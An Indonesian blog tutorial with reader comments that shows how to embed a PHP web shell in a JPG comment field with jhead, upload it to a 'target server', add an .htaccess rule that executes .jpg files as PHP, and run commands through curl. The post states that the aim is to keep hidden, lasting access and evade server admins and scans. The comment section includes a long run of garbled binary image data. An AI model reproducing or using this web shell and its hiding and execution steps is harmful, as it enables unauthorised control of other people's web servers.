• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Menyisipkan File Backdoor PHP ke File Gambar JPG

June 10, 2016 by Jack Wilder 36 Comments

Ada banyak cara yang bisa dilakukan untuk membuat file backdoor atau akses pintu belakang yang kita buat di server target tetap awet alias tidak ketauan dan diterminate oleh admin webnya. Mulai dari menyisipkan file hidden uploader ke file yang sudah ada dll. Namun tentu saja trik tersebut masih ada kekurangan karena file tetap akan dianggap virus ketika server di scan.

Nah kali ini kita akan membahas cara menyisipkan file backdoor php ke file gambar. Dan tentu saja ini bisa kita lakukan dengan cara mendownload file yang ada di server, modifikasi data, upload kemabali. Dengan ini kemungkinan backdoor kita ditemukan mengecil ( kecuali webmasternya pro ) .

Nah seperti yang terlihat diatas, file tersebut saat diakses langsung akan terlihat seperti gambar normal pada umumnya, namun tentu file tersebut lebih istimewa bagi attacker yang menyisipkan backdoor ke file tersebut 😀 .
Untuk menyisipkan file backdoor ke file gambar seperti itu, kita bisa menggunakan Jhead. Gunakan Linux :p
install dengan command :
sudo apt-get install jhead

Selanjutnya kita siapkan file gambar yang akan kita sisipi backdoor.
Untuk tutorial kali ini saya menggunakan file gambar asuna.jpg yang saya simpan di ~/Desktop/bd/
Pertama, kita murnikan file gambar tadi dengan command
jhead -purejpg asuna.jpg

Ini untuk menghapus comment ataupun script yang mungkin disisipkan sebelumnya.

Lalu masukkan command :
jhead -ce asuna.jpg

Selanjutnya kita masukkan script berikut ke dalam gambar :
<?php passthru($_POST['cmd']); __halt_compiler();

basic vim diperlukan karena yang digunakan adalah vim editor :p
Setelah disave, harusnya script tadi sudah nyempil di comment.

Lalu kita upload gambar yang disipi backdoor tadi ke server target.
Jangan lupa di direktori yang sama tambahkan .htaccess dengan isi :
AddType application/x-httpd-php .jpg

Ini ditujukan agar sript php didalamnya tetap terbaca meski ekstensi file nya bukan php.
Nah, cara mengakses backdoor nya :
curl -d cmd="command disini" webtarget/gambar.jpg

Contoh :
curl -d cmd="uname -a; whoami; id" http://localhost/gambar/asuna.jpg

menarik bukan ?
Oke sekian tutorial kali ini, selamat berpuasa.
Shares

Filed Under: Backdoor Tagged With: Hacker News, Linux, Tips Dan Trik, WebShell

Reader Interactions

Comments

  1. Anonim says

    June 10, 2016 at 5:27 pm

    Bagi theme ubuntu lu bro 😀 ggwp

    Reply
    • chiaki says

      June 10, 2016 at 8:41 pm

      http://www.linuxsec.org/2016/03/ultraflaticons-ubuntu.html

      Reply
  2. Anonim says

    June 10, 2016 at 10:54 pm

    untuk mendeteksinya? sebagai antisipasi

    Reply
    • chiaki says

      June 11, 2016 at 6:08 am

      ya cek pake jhead / exiftool

      Reply
  3. Anonim says

    June 11, 2016 at 8:42 am

    Apa bisa jalan scripnya kalau file gambar dibuka di linux desktop ?

    Reply
    • chiaki says

      June 11, 2016 at 12:01 pm

      maksudnya gimana ?

      Reply
    • chiaki says

      June 11, 2016 at 12:03 pm

      maksudnya gimana ?

      Reply
  4. Randy Clound says

    June 11, 2016 at 2:35 pm

    maksudnya mas jack wilder,gambar nya di eksekusi di desktop ,sperti si korban ngambil tuhh gambar trus dia klik di pc nya.kyak gitu sihh klau ane pikir???

    Reply
  5. chanel17 JE says

    October 20, 2016 at 11:30 am

    gmna cara nyimpanyya mas,,,stlah d msukin scrip…

    Reply
    • Ryu Hazami says

      December 23, 2016 at 6:33 am

      pencet esc terus ketik gini ":wq" tanpa tanda petik.. terus enter

      Reply
  6. Berandal says

    May 13, 2017 at 3:45 pm

    Gw kan bukan linux user nih mas, kalo misal gw minta tolong temen buat nyisipin php ke jpg kek tutor diatas, trus dikirim ke gw, apa tetep work sebagai backdoor?
    Makasih sbelumnya

    Reply
    • Ichsan Haekal says

      June 29, 2017 at 4:30 pm

      bisa koooooooo :d :d

      Reply
  7. ramdhan firmansyah says

    October 19, 2017 at 3:34 pm

    masukin htcacces nya gimana bang?,

    Reply
  8. ChAoS007 says

    January 3, 2018 at 7:02 pm

    Gan Ini Gimana Sih Ane Kurang Paham Mohon Penjelasan selebihnya
    Ane Juga Kagak Bisa Make Vim Tapi Apa Bisa Gak Diganti Dengan Leafpad Atau Sejenisnya
    Dan Itu Caranya Masukin .htaccess gimana Ane Kagak Tau

    Maaf Ngerepotin Min
    Ane Masih Noob :'(

    Reply
    • Ratna Antika says

      January 8, 2018 at 6:27 pm

      baca komen dibawah

      Reply
      • ChAoS007 says

        January 15, 2018 at 8:01 am

        Bentuk htaccessnya gimana min ?
        ane belum tau gimana source codenya
        Disini Ada Tutornya kgk ??

        Reply
    • Majulah Singapura says

      October 22, 2019 at 11:45 am

      Pas udh jhead -ce images.jpg
      Gak bisa ditutup Padhal Udh diTeken ctrl+ dari Q sampe M gak Bisa2

      Reply
  9. Cvar1984 says

    January 8, 2018 at 2:22 pm

    Kalo

    Bisa ga?
    Dan kenapa harus pake upload htacces segala?
    Kalo pake htacces mah dah aja tinggal
    $mv x.php x.jpg ( rename php ke jpg )
    Tanpa harus inject juga bisa

    Reply
    • Ratna Antika says

      January 8, 2018 at 6:21 pm

      you dont get the point dude 🙂 inti dari post ini, kita nginject gambar dengan kode, gambarnya ttp normal ketika diakses. kalo sekedar php direname emang keluar gambar?

      dan htaccess ini cuma contoh buat eksekusi nya. bisa aja dikasih fungsi dipanggil di php script. cuman kan bahasan di tutorial ini tentang backdoor di gambar nya.

      kalo maksudmu file jpg dipasang backdoor langsung bisa dipanggil tanpa dikasih tambahan, la mbok pikir web server duwek e mbok mu ta cok asu bangsaatttttt

      Reply
      • YusNet32 says

        December 12, 2018 at 10:40 am

        Anjiir ngegad :v

        Reply
  10. lLuzTr4t10n says

    March 20, 2018 at 1:41 pm

    Min upload maksudnya upload di web web gitu? Trus htacces nya gimana ya 😀

    Reply
  11. kyu kazami says

    April 10, 2018 at 9:33 pm

    masih bingung save nya gmn

    Reply
  12. Pota says

    April 11, 2018 at 5:15 pm

    �!`��J���`�vbMķ\a!�P��i��(J�f�� d�u���8
    ��-O����H-µT^��0r�u���|78w`��f���YwUa������3����6=��a�P=���u�^ ����?�
    $4D�9Y��!�<_��(:f!:����*�
    ��]?����Aa9�=~\�v�yJt�H��4D��F�����[���H��� ��]�$�1\8#P��lf
    �-'��2���)U�р�̆
    �$���,!T�*���,GO5S�B ��ߓY��PNă;��o����J j�ޟl
    ‘4LQ’����Ia”Z�����E�]�����XE��Ln�(��L��.=�����5����7|~�P�����-�(����Ϣ�[email protected]�”V���@I=X�ST�����K��
    ;��xZ�K;a�$�h�#(6����Y�a��y� k[� �L�7�a0(�h����FY)
    6�Ut��9*[��[������c}��8B�bM(��tq��”B�
    ɭ�� ʠ��{�` U��.N���~=����3w����Br����H�A�3����P���\�r�݃�p�”g,�n�,�u�c�M%HQ�
    j9�3�1�Ki!��x[����Y4���N3�T���.����V���n FuV�� �:(T���Ev�I�:-��5�<��E$����J%��"N=����ӀL�)(Y
    4� ��B��U�[�{�X!%:L� Y�ӂT1J
    J/U�<cJ�-����O9&�����˔��*�?\
    M!vDG3��9ok�Οf��'�!�����9O��O���W�?�}F�#R������S0O����m b��8��H�.��[email protected]�{�C
    n&a��`�Q3���9�u�6B�
    F���(� !L���mŰ& 4���q7�Y����”T�y��0Xy�M�����i��ۯ����F��i�a���cO�� ������G��o��p����4�^[[?62;9;c�]���ĩaf��7�;�� ۩��HkK�ͼq5�k#h�������n����Ŭ�4����O����韽��I?��”��>����q#k,x,l��Q��(����c_L��-������S���i6S����O��YI~����iS�w�<j��GYx8bh�-�`ZzL�,���S/?�q
    46� ���槣��??��Z�5^���%B_�����Ls�m��$)��#�9$Sr��a���Ay
    Bł�:����S��Ɵ�����~q"���]|b�ij%�7��u�������Mrg���w�[email protected]��]�b6��?/�y�&An���H��7���GS��n��Uf"���C���U "0ޞҳV�b�2(�����!�ճ�_?w[��+?g�{
    ��HE�S�H��gq1����8]�<��Zgu*q�\��o;�MG�~�5�[email protected]�lKr��b �^G/U�/�I0b�m1�n���~L����s��C�����l�n��'4z?�������'!1AQaq��������� �?�a�~�W�U�N~�����?�� =��5Ǥ�փ����f/��������%�u?j<3qu��0���H�1`�7���0
    ��ɱ�D�pU��}�;w�|����0��*���;דKYg=qV��r��}?��pX�Ұ�����S���8?�E���q϶�����KcC��n:�gq,`��\�{/��$f������nv�V�fR�ڙ�q��X[��v��O�,���Z'�g]f�ؙJc��%4�����u� ?6���7jT���|&�. �� �r!��I���JH�
    ���զ��lj�~G���a��:�"Ί�
    ��.�'��� �Xo:����4 ���AD��ő8″��$��%Fs�?0�gHw���Zp���%#� )P�Q`����W�����dI]��&r��q�8�X�myB(<<�Hǹ�DG����xH���`��Q�F\W�Ӝa��E�]��0�;�޽2���<e(�
    +-�zJ{1^�4�;� U1�nc�:�;F-i��������eTfk���X {
    C��P������ ���/J1v�h�~��9trMfY�D��1z(�ߍ��\b
    F;c?(}EF�}�H=���}zvNze�Wi�u�EZ ay�� ���Dg��8]�6 #d��t �O�Bc��-|/���Z>�[email protected]�
    �”4�0ڂ1[��s0��+��!PU�/ne�3��L?��\��^�~z�zI�9
    �ydM�D�Y�JE� ��Ĭ2q>\�_^�a��”v�c�mÍ�������e�jO3yR|�v�2o�&�yU�4fb�ؕ]����H�$r��}�{Ў���������↏”\�$�㏧.טu�}�e�ʔ�@��b����f��o����toz/8������$s/��X�����t�N�̒e”v�aJ���όM=
    M�N�c#�y�Pũ�R2�’x��e4v�?5�C��[email protected]�`�.(Qe ����J�= T�pA)��T���4�[��
    =�s��1�
    9HB�”+��g)�+���{�t�Kx�p��,:���
    �R��)a}<B������\�_��2O���Ǥ��/K�(��1�����*
    �Ӟq�kpc �#��8s
    ��HK���Ό�W�-j�.��\?��O�,�ˊJ����F�i
    ���R�@f"�����Z{
    ������
    X�#^�ސz�̑5�1P\4O┮Hq�$�7l���L�ۤ#�^��p��Un��,1�;\K�x=5E��L�+nK�ш��O�f��Ԑx�IO+����1������'�d-
    ۮaV�5�8�&W��֩��]���_ό��_S��D�N�-a��ED�Cf�)]C�yF����5�RU���D���L�&�We��e�ׂL ŏD-:;~7�Ve�*�%��3���k�Ĝ��x�������K�����
    /��O�E���]9|��1qVv�%��m�H� �b
    �T)���v���~�YhE��ߧ����/
    ��=ݨ�
    :�z#"�[email protected]%G�L��b��C�#�<K��#�lZ��/�?���Zg�3PDŽX�x�ѥs��U��q��ER�|F�-�˱L���_��a����$L�S=�����)���A�g�k�8¶
    �N`��\bC:<U������̾��v�����o��h�=����{���MH�_�#��#�.π�)DVΣ���3�=��$�H(����0�k��V���Z]�XQ��[email protected]����E��R��ۓ)�0$�[email protected]��DحQ��D��`)B.�~��� �1=`�5���
    J�6!,�*�#9|���r�,P�[�[X�TF��O��+�c�����<j������A8�wlyЛU&��/;�Le��_H2I�XUc)�ÙŽP���Z��U��gu��Iq����"����<�2�^��8���']�\���N�:B��bꨤ���Ӏ�]{Y���x��\���L�PJH"bg�uDɚ �H�i()$�����t��9G�+���X��3(�
    p�m�K�@,��loc!|J�@'�E��14S_���oz�bq�+�a�)�%4 * �ɡ�V���֞�mR��%�Go0M���{^�����I���*��9{[��W7�{�2dUI���AeIʙ(��� J��q
    ^�_�(�F�-N�&��ҏ� }�t�2HU�8��l�ljg\;��m%�:.��
    U��q�p攂�#9
    ��paI��0�1�=�
    fP��Ҩ��]��?��ZT�+�P���Y2-�c���m��H �IA���3&T��z�u�j���N��li�
    �r��(!䪸�5e�B�U�8I%�sr��m\Asi{�:��y�
    ‘�
    f� �V?�W��[�ϫ�ݏb���@�E^$��RB�B
    ���B�T�”��M
    �%�� RB�W*,��mq^ۘ�R,�+��4�1��ܢs�S���&���V�FN�{ǰ�:SKj#��F�+X���q�`����^x*�;�U8���p����Tjp��6�wI�&2Z��f�.’�5�’�”��ӆ\24�”:�
    ^P�MRH!��)�1�ԩv(�ɨI����r�E��{��
    ��d��4
    ���5�(�lʟ\�H
    +Ц�@Ʃx�J?
    ���1�}�������7
    #+&
    hs�4�`�4�^zK�E��d��B�+�$
    �g.uCS��[email protected]�-��PPX�U ��Nl���y��,
    � ����9��Q6��9��� �.���{Ol�*>fj
    �b$���gƯ�b�-]�#�o�סDž��*v՗��1��10����Y7���”L�d�T�<jtFY���]#2��h�����xF�6� �~dx�a���"Ձa��(�
    *A
    ��h�b��S(���:����^Ӈo���Q�%W���! Q�9�hP9X��.����T���dX�8` ��O2�I+�u��Y�
    �c�*���X
    ����@�[email protected] UE
    e��L
    X�&7DfX���xJi0��[email protected]�`;�s
    �� ���&`�C#�h�
    �(�] ��Ez�m
    ��jW4l���$��-�ۏ11�x��j嬰��Z�:�#�����S��7!8�x��� ����CY�8�&�KɅQ��[email protected] H$P�S��LFp”��֩h2�@(%��Yi�+
    %d�eP��`])�^f���t�X����l~���&i;Ǣg|} n�썺U�~���ȅ\n>t��1�p�nļ�!�N�N�~_)
    Woa,��F�s�A�G;���I $
    !!��% ���C�2h�a�Q��q�! , 2�’D��
    �RK9���$a����rZ����&�s�Ȏ-µ��Va���H�k|��;jj����屜M�J}�[email protected]���D�PrRᘀ
    �@
    �q9�Xe�U�:��3���
    ����%`P�,�`4 �Ȩ(�v��Ġ�4E�F’DP� ��P ~_���7i”k5��^�ynb�(�k�;���g���ĕng���E!R���0d
    S�����AM������������ ��k*A`6A##t0J�N
    1��e6h����i���
    ��%|ve�C�x /ĝ�L��d��H�@�
    Nu���X��)q�
    3″a)&å[hȧ����`-�&���O+bXqBOLRH��긐$�<�|�T�zG�

    Untuk penyelesaian gimana ka?

    Reply
  13. Nano says

    November 29, 2018 at 10:10 am

    aku coba kok “Comment not modified” ya? 🙁

    Reply
  14. bayu rizky says

    December 26, 2018 at 3:22 pm

    ESC > SHIFT > Z > Z Kyu ngentod

    Reply
  15. Bayu R says

    March 14, 2019 at 10:56 pm

    Mantap om..

    Reply
  16. Anjir gkpunya Linux says

    June 2, 2019 at 10:22 am

    Kalau edit dan bikin comment nya via file eksplorer di windows kok gk work :v

    Reply
  17. Muhammad Rizky says

    June 30, 2019 at 1:24 am

    Sebenernya cara ini ga terlalu work juga ya? saya nyoba di vps dan localhost pun hasilnya tetep biner dari gambarnnya yang kebaca

    Reply
    • Agus Eko Paranto says

      October 20, 2019 at 10:05 am

      Mas, bantu kami donk…
      Kami Drivers Grab, sering banget kena orderan fiktif dari sesama driver. Nomer HPnya pemesan aktif dan telah tersyncron dengan WA. Saya tidak tahu cara menggunakan tutorial Kakak…

      Apakah Kakak bersedia membantu membuatkan untuk kami lalu kami bisa check lokasi Pemesan dengan cara tutorial Kakak?
      Mohon bantu kami Kak, sangat meresahkan mereka yang berlaku curang. Semoga kenaikkan Kakak bisa menjadi amal jariyah
      WA saya Kak 081328698476

      Reply
  18. Reza says

    July 25, 2019 at 5:56 pm

    Ane buat backdoor menggunakan tool a-rat ditermux gan tp dgn bhasa programan python. Lalu bagaimana cara menyisipkannya ke gambar atau Url ?…

    Reply
  19. mika says

    September 13, 2019 at 10:50 pm

    curl: (6) Could not resolve host: id=
    kenapa itu gan?

    Reply
  20. Agus Eko Paranto says

    October 20, 2019 at 9:26 am

    Mas, bantu kami donk…
    Kami Drivers Grab, sering banget kena orderan fiktif dari sesama driver. Nomer HPnya pemesan aktif dan telah tersyncron dengan WA. Saya tidak tahu cara menggunakan tutorial Kakak…

    Apakah Kakak bersedia membantu membuatkan untuk kami lalu kami bisa check lokasi Pemesan dengan cara tutorial Kakak?
    Mohon bantu kami Kak, sangat meresahkan mereka yang berlaku curang. Semoga kenaikkan Kakak bisa menjadi amal jariyah
    WA saya Kak 081328698476

    Reply
  21. Wibu Denial says

    January 18, 2020 at 9:03 pm

    Asuna Lon* XD

    Reply
  22. sugi says

    February 15, 2020 at 12:55 pm

    met siang gan, mau tanya nih kalo termux itu berarti saya harus install dulu ya, terima kasih

    Reply
  23. Tuan Tampan says

    September 10, 2020 at 8:42 am

    Gak work …. Saya nyoba tutorial diatas langsung online pake shared hosting dari GMO Globalsign Group (z com) _ saya curl eh kluar semua kode gambar kotak – kotak itu di terminal ,, saya akses domain pake browser eh malah kedownload itu gambarnya … busuk

    Reply
  24. OmgDec says

    December 2, 2020 at 11:24 am

    Di website nya tanpa .htaccess bisa ga gan?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

bWAPP Remote File Inclusion Medium Security Level

WordPress Army Knife CSRF File Upload Vulnerability

Exploit WPStore Themes Upload Vulnerability

Exploit WordPress Plugin CopySafe PDF Protection Shell Upload

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Shopify Custom Domain or Subdomain Takeover

Mass Deface setelah Rooting Server

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Powered by WordPress and Genesis Framework. Style by LinuxSec.